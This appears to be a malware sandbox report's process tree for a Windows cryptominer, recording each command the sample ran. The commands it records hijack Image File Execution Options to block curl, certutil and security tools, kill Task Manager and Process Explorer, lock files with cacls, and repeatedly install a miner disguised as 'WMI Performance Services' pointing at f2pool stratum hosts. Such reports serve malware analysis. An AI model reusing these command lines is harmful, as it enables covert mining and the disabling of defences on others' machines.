C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED
3⤵
- Launches sc.exe
PID:6996

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:4380

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:4472

C:\Windows\SysWOW64\sc.exe
sc stop Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:4444

C:\Windows\SysWOW64\sc.exe
sc delete Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:7044

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4848

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
PID:2252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5184

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:4288

C:\Windows\SysWOW64\sc.exe
sc stop conhost
3⤵
- Launches sc.exe
PID:5544

C:\Windows\SysWOW64\sc.exe
sc delete conhost
3⤵
- Launches sc.exe
PID:4956

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:7124

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\conhost.exe /a
3⤵
- Modifies file permissions
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\conhost.exe /d everyone
3⤵
PID:6924

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3⤵
PID:6440

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:6584

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:6900

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:2936

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:6352

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:6084

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:4612

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
3⤵
PID:5484

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:4588

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
- Deletes itself
PID:2244

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:3100

\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2512

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4796

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:3616

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:2188

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:2732

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:4028

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:304

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:1292

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
PID:4840

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3560

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1072

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:4016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:192

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4504

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4680

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4704

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:2332

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4672

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:756

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5772

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:2644

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:208

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:2536

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:4520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4716

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5648

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4668

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5632

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:3288

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1344

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4244

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5352

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:3628

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4908

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2400

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5068

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4508

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:2456

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:3492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:3780

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4664

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:352

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2696

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3688

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:1040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5452

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2764

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4904

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:504

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2332

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2256

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5648

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:3996

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:496

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4016

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Executes dropped EXE
PID:2644

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
- Executes dropped EXE
PID:1908

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5900

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4852

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:644

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4976

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4408

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2460

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
PID:3688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5792

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5928

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4468

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6084

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4888

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4324

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:864

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4304

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1956

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6732

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3076

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2280

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:5072

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3612

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4280

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4836

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1748

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3852

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1664

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4228

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:2252

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:392

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5348

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5244

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5508

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4828

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:5500

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:5492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:5484

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5476

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5468

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6036

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5956

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:6028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5936

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
PID:5476

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6980

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5852

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3852

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5744

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5232

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6972

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:348

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3172

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:1524

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5148

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5340

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5432

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6064

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4604

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:6588

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4236

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4964

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5380

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5364

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5352

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5172

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4680

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4236

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4856

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:5364

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6120

\??\c:\windows\Fonts\svchost.exe
